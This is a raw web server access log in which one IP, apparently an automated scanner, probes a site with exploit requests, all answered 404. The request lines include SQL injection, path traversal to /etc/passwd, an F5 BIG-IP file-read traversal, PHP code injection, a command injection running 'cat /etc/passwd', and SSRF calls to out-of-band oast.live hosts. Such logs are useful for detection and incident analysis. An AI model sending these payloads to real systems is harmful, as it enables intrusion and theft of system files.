137.220.197.141 - - [21/Jan/2024:21:17:46 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:17:48 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:18:13 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:18:25 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:18:27 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:18:37 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:22:39 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:23:53 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:23:55 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:24:43 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:24:56 +0100] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:25:23 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:25:25 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:25:36 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:25:38 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:26:15 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:26:22 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:26:24 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:26:28 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:26:30 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:27:28 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:27:28 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:27:31 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:28:04 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:28:16 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:28:25 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:28:27 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:28:30 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:29:20 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:29:32 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:29:47 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:30:30 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:30:32 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:30:57 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:30:59 +0100] "POST /auth/requestreset HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:32:19 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:33:17 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:33:42 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:33:43 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:34:24 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:34:26 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:34:43 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:35:10 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:36:41 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:36:43 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:36:45 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:37:12 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:12 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:14 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:29 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:29 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:31 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:43 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:54 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:55 +0100] "POST /os/mxperson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:38:57 +0100] "POST /meaweb/os/mxperson HTTP/1.1" 404 952
192.155.88.231 - - [21/Jan/2024:21:39:03 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:39:08 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
172.104.11.4 - - [21/Jan/2024:21:39:19 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:40:06 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:40:17 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:40:46 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:41:01 +0100] "POST /dfsms/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:41:16 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:41:18 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:41:20 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:41:48 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:41:50 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:41:52 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:05 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:15 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:16 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:25 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:27 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:29 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:30 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:30 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:42:40 +0100] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:43:07 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:43:08 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:43:10 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:43:30 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:43:38 +0100] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:43:40 +0100] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:45:46 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:46:18 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:47:13 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:47:16 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:47:24 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:47:26 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:47:36 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:47:38 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:47:41 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:21:48:34 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:49:21 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:49:24 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:49:33 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:49:36 +0100] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:49:46 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:50:39 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:01 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:03 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:05 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:07 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:07 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:09 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:11 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:13 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:15 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:30 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:34 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:36 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:38 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:51:52 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:52:22 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:52:24 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:52:24 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:52:26 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:53:15 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:53:30 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:53:31 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:53:49 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:54:03 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:54:05 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:54:07 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:54:28 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:54:42 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:54:53 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:54:56 +0100] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:55:11 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:55:13 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:55:15 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:55:52 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:56:52 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:56:54 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:56:56 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:57:24 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:57:26 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:57:28 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:57:32 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:57:51 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:57:57 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsogwigc6qamzixoj.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:58:02 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:58:02 +0100] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:58:04 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:58:06 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:58:13 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:18 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:26 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsogmayifjris7u55.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:26 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:28 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:31 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:37 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsogisa5a7wincmbu.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:45 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:21:59:50 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsoghu1fzis3cn6ce.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:00:00 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:01:41 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:01:54 +0100] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:02:20 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:02:52 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsog9kkf8y9dfrujq.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:03:33 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:03:42 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsog4wwj69bnxwips.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:03:49 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:00 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:05 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsognig6tfq4srfmn.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:13 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:23 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:25 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:27 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:29 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:31 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:33 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:33 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:35 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:37 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:04:59 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:05:39 +0100] "POST /session/create HTTP/1.1" 404 952
200.81.185.179 - - [21/Jan/2024:22:05:45 +0100] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:05:50 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:05:52 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:05:54 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:05:56 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:05:58 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:06:00 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:06:02 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:06:04 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:00 +0100] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:02 +0100] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:04 +0100] "GET /magmi/web/info.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:16 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:20 +0100] "POST /account/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:22 +0100] "POST /opensis/index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:24 +0100] "POST /index.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:37 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:39 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:41 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:43 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:45 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:47 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:49 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:07:51 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:08:01 +0100] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cmm00rc3m87t5g88qsog99h48tz9j8pnn.oast.live%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:08:05 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:08:15 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:08:17 +0100] "POST /api/jsonws/invoke HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:08:27 +0100] "GET /metrics/v1/mbeans HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:08:28 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:08:46 +0100] "POST /session/create HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:09:42 +0100] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:22:09:50 +0100] "POST /account/index.php HTTP/1.1" 404 952
